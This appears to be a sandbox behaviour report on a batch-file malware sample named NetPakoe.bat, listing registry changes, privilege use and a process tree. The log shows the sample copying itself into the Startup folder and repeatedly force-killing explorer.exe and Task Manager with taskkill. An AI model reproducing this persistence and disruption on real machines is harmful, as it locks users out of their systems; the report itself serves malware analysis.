| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Kills process with taskkill
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{1EAF4BB5-CBD3-41EA-B850-B80B78B729F2} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{B5966072-D909-4EFE-85E8-E09EE48390BD} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{80852F6A-0A13-4C4C-A60E-7F2200D44B56} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{04814A63-8BE9-4644-A350-548370E1C5B4} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{B699431B-14AA-4B85-8FEA-547992CEABB7} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{A87C93D7-4A78-4DC5-A4C1-97BC1B96D899} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{FE7E43B7-7BB6-4B05-81AF-5CA7596ED476} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{10D2CA1F-5974-422C-89A3-FCB978C5C0CC} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{F1C3C17C-D049-4849-8958-DCDF01D702BA} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{E6735B21-312C-4A3C-BAF2-AECBA094823C} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{A99CA888-4827-46A3-8BFB-1FE1D652C5B3} | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe.bat"
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
